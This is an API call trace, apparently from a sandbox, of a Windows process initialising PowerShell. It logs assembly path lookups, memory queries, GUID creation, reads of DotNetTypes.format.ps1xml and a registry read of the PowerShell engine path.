	[0430.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0430.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0430.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0430.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0430.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0430.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.383] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.383] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7f9a6049, Data2=0x2142, Data3=0x4363, Data4=([0]=0xa7, [1]=0x8c, [2]=0xec, [3]=0x59, [4]=0xc1, [5]=0xfb, [6]=0x31, [7]=0xd2))) returned 0x0
	[0430.383] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x35dd39df, Data2=0x7029, Data3=0x4056, Data4=([0]=0xb9, [1]=0x45, [2]=0x75, [3]=0xeb, [4]=0xd1, [5]=0x80, [6]=0xf0, [7]=0xbe))) returned 0x0
	[0430.383] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.384] VirtualQuery (in: lpAddress=0x26bcd0, lpBuffer=0x26cb90, dwLength=0x30 | out: lpBuffer=0x26cb90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.384] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x7621ce86, Data2=0xc72b, Data3=0x424b, Data4=([0]=0xa0, [1]=0x33, [2]=0x27, [3]=0x89, [4]=0x5a, [5]=0x4c, [6]=0x8f, [7]=0xb5))) returned 0x0
	[0430.384] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd70177f7, Data2=0x2adb, Data3=0x4bb1, Data4=([0]=0xb7, [1]=0x1e, [2]=0x14, [3]=0xb2, [4]=0xcd, [5]=0xbc, [6]=0xa1, [7]=0xfa))) returned 0x0
	[0430.384] VirtualQuery (in: lpAddress=0x26bf20, lpBuffer=0x26cde0, dwLength=0x30 | out: lpBuffer=0x26cde0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.384] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.384] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.384] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x4c628a46, Data2=0xdf52, Data3=0x4697, Data4=([0]=0xbe, [1]=0x54, [2]=0x96, [3]=0xd0, [4]=0x99, [5]=0x22, [6]=0x90, [7]=0xcb))) returned 0x0
	[0430.385] VirtualQuery (in: lpAddress=0x26bf20, lpBuffer=0x26cde0, dwLength=0x30 | out: lpBuffer=0x26cde0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.385] VirtualQuery (in: lpAddress=0x26bd40, lpBuffer=0x26cc00, dwLength=0x30 | out: lpBuffer=0x26cc00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.385] VirtualQuery (in: lpAddress=0x26b590, lpBuffer=0x26c450, dwLength=0x30 | out: lpBuffer=0x26c450*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.385] VirtualQuery (in: lpAddress=0x26b590, lpBuffer=0x26c450, dwLength=0x30 | out: lpBuffer=0x26c450*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.385] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6d293f1e, Data2=0xbbc, Data3=0x4757, Data4=([0]=0x89, [1]=0xfa, [2]=0x3, [3]=0xe4, [4]=0xd9, [5]=0x6d, [6]=0xa0, [7]=0x56))) returned 0x0
	[0430.385] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x27fc6c0, Data2=0x30d5, Data3=0x4a1b, Data4=([0]=0x94, [1]=0xc8, [2]=0xf7, [3]=0x28, [4]=0x50, [5]=0x55, [6]=0xe, [7]=0x1c))) returned 0x0
	[0430.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.386] SetErrorMode (uMode=0x1) returned 0x1
	[0430.386] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.386] GetFileType (hFile=0x1c8) returned 0x1
	[0430.386] SetErrorMode (uMode=0x1) returned 0x1
	[0430.386] GetFileType (hFile=0x1c8) returned 0x1
	[0430.386] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.387] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.388] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.389] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.390] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.390] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.390] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.390] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.391] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.391] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.392] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0xbce, lpOverlapped=0x0) returned 1
	[0430.392] ReadFile (in: hFile=0x1c8, lpBuffer=0x35faefe, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35faefe*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.392] ReadFile (in: hFile=0x1c8, lpBuffer=0x35fb7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35fb7c8*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.393] SetErrorMode (uMode=0x1) returned 0x1
	[0430.393] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0430.393] SetErrorMode (uMode=0x1) returned 0x1
	[0430.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.393] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.393] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.393] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.394] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.394] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xaf2049b9, Data2=0xd43f, Data3=0x4a06, Data4=([0]=0xba, [1]=0xab, [2]=0x26, [3]=0xa9, [4]=0x19, [5]=0x64, [6]=0xc0, [7]=0xe6))) returned 0x0
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1c3d346a, Data2=0x56d, Data3=0x4cf7, Data4=([0]=0x91, [1]=0x1b, [2]=0x4f, [3]=0x21, [4]=0xc8, [5]=0xfe, [6]=0xfd, [7]=0xb4))) returned 0x0
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x9e62d99e, Data2=0x129, Data3=0x4d18, Data4=([0]=0xb5, [1]=0x5a, [2]=0x5a, [3]=0x50, [4]=0x5a, [5]=0x9a, [6]=0xb9, [7]=0x8c))) returned 0x0
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xfa127819, Data2=0x66c3, Data3=0x4f07, Data4=([0]=0xb1, [1]=0xe7, [2]=0xa4, [3]=0x9d, [4]=0xe7, [5]=0xf7, [6]=0x50, [7]=0xde))) returned 0x0
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x27d7eeab, Data2=0x5b62, Data3=0x4efa, Data4=([0]=0x92, [1]=0x41, [2]=0xfa, [3]=0x27, [4]=0x8f, [5]=0x17, [6]=0x58, [7]=0x7e))) returned 0x0
	[0430.396] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x2bd06693, Data2=0xdee3, Data3=0x469a, Data4=([0]=0xac, [1]=0x99, [2]=0x18, [3]=0x69, [4]=0xa9, [5]=0x45, [6]=0xf6, [7]=0xc9))) returned 0x0
	[0430.396] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.397] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x784fa5c8, Data2=0x30cd, Data3=0x4132, Data4=([0]=0x98, [1]=0x33, [2]=0xd0, [3]=0x21, [4]=0x60, [5]=0xbb, [6]=0x16, [7]=0xb0))) returned 0x0
	[0430.397] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.397] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.397] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x36c9f548, Data2=0x8f5f, Data3=0x4f65, Data4=([0]=0xaa, [1]=0xc7, [2]=0x95, [3]=0x5e, [4]=0xa4, [5]=0xa6, [6]=0xc1, [7]=0x1e))) returned 0x0
	[0430.397] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x9cd1544, Data2=0x71b3, Data3=0x4527, Data4=([0]=0xb8, [1]=0x81, [2]=0x17, [3]=0xfc, [4]=0x37, [5]=0xe, [6]=0xfd, [7]=0xef))) returned 0x0
	[0430.397] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1d21b4b, Data2=0x24a3, Data3=0x44f2, Data4=([0]=0xab, [1]=0xd9, [2]=0xc3, [3]=0xad, [4]=0x5f, [5]=0x9c, [6]=0xb4, [7]=0x12))) returned 0x0
	[0430.397] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xbde25234, Data2=0x5225, Data3=0x4f54, Data4=([0]=0xa7, [1]=0xc, [2]=0x66, [3]=0xb3, [4]=0xd2, [5]=0x99, [6]=0x82, [7]=0xe9))) returned 0x0
	[0430.398] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.398] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1a0ac660, Data2=0xe079, Data3=0x442f, Data4=([0]=0x8b, [1]=0x69, [2]=0xe0, [3]=0xc1, [4]=0xfb, [5]=0xec, [6]=0xde, [7]=0x3f))) returned 0x0
	[0430.398] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.398] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.398] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.398] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.399] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.399] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x11ded241, Data2=0x3e6a, Data3=0x4b07, Data4=([0]=0x9e, [1]=0xd2, [2]=0x54, [3]=0x9, [4]=0x4b, [5]=0xdc, [6]=0x86, [7]=0xf7))) returned 0x0
	[0430.399] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1b7df787, Data2=0x894d, Data3=0x4b8f, Data4=([0]=0xbf, [1]=0x1e, [2]=0x61, [3]=0x10, [4]=0x6f, [5]=0x14, [6]=0xfb, [7]=0x66))) returned 0x0
	[0430.399] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd8326dd0, Data2=0x599b, Data3=0x409c, Data4=([0]=0xac, [1]=0x27, [2]=0x18, [3]=0x15, [4]=0xe3, [5]=0xea, [6]=0x65, [7]=0xef))) returned 0x0
	[0430.399] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x8d6cc411, Data2=0xd71, Data3=0x45b2, Data4=([0]=0xa5, [1]=0x43, [2]=0x26, [3]=0xba, [4]=0x81, [5]=0x32, [6]=0xab, [7]=0xea))) returned 0x0
	[0430.399] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x414d60e, Data2=0xfe4f, Data3=0x4dba, Data4=([0]=0xba, [1]=0x20, [2]=0xf2, [3]=0x71, [4]=0x33, [5]=0xc8, [6]=0xa5, [7]=0x49))) returned 0x0
	[0430.399] VirtualQuery (in: lpAddress=0x26bf20, lpBuffer=0x26cde0, dwLength=0x30 | out: lpBuffer=0x26cde0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xfde8b0cd, Data2=0x4047, Data3=0x47af, Data4=([0]=0xae, [1]=0x23, [2]=0xc4, [3]=0x7a, [4]=0x9, [5]=0x7c, [6]=0xac, [7]=0x47))) returned 0x0
